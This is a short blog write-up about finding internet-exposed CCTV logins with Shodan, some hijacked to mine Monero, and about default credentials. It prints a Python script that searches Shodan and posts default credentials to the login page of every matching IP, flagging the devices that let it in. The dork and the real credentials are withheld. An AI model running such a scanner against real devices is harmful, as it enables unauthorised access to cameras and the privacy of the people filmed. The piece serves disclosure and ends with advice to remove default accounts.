CCTV cameras default credentials

I’m gonna start this write-up as a story.

This was about 9:00 pm, I was a little tired from bug bounty programs and normally when I’m tired from bug bounty programs I spent my time reading new methods or doing some research.

By doing some research, using Shodan and Censys on compromised servers that are used to mine Monero (Coinhive and other technologies) I found a CCTV(closed-circuit television) login page mining Monero.

And I was thinking if this CCTV login page was compromised maybe the attacker managed to compromise all other CCTV using this technology. Since I don’t want publicly shaming bad security let’s call this product “Shitty CCTV”.

So by looking to the response header and source code, I created a dork for Shodan (Not disclosing the dork since I don’t want to be blamed for this being exploited). From this dork, I got approximately 5000 web applications most of them have more than one camera since this product is mainly used by companies (hotels, plants, schools, etc).

By checking their login pages I noticed only a few were mining Monero. Now how the attacker had access to this application?

The first thing that comes to my mind and probably was the method the attacker used to gain access to the CCTV web application was looking in Google for default credentials.

Example: Shitty CCTV default credentials.

And guess what it worked. So basically it is possible to access all cameras with default credentials.

But let take this default credentials method a step forward and ignore the fact that can be used to mine Monero. If I can get a list of IP’s using this technology, I can automate this process to check every IP if the default credentials work. And if it works this technology is compromising workplace privacy.

Using python with the shodan library resulted in the following script:

import shodan
import sys
import requests

API_KEY = "APIKEY"


try:
        api = shodan.Shodan(API_KEY)
        result = api.search('html: login.dork')

        for service in result['matches']:
                ip = service['ip_str']
                try:
                    cctv = requests.post('http://'+ip+'/login', json = {'username':'default', 'password':'credentials'})
                    if cctv.status_code==200:
                        print 'Vulnerable',ip,str(cctv.status_code)
                    elif cctv.status_code==403:
                        print 'Not vulnerable',ip,str(cctv.status_code)
                    else:
                        continue
                except:
                    pass
except Exception as e:
        print 'Error: %s' % e
        sys.exit(1)

Lesson learned, if you have any CCTV or IOT device remove the default credentials account or your device could be compromised. Stay safe.

Be First to Comment

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    This site uses Akismet to reduce spam. Learn how your comment data is processed.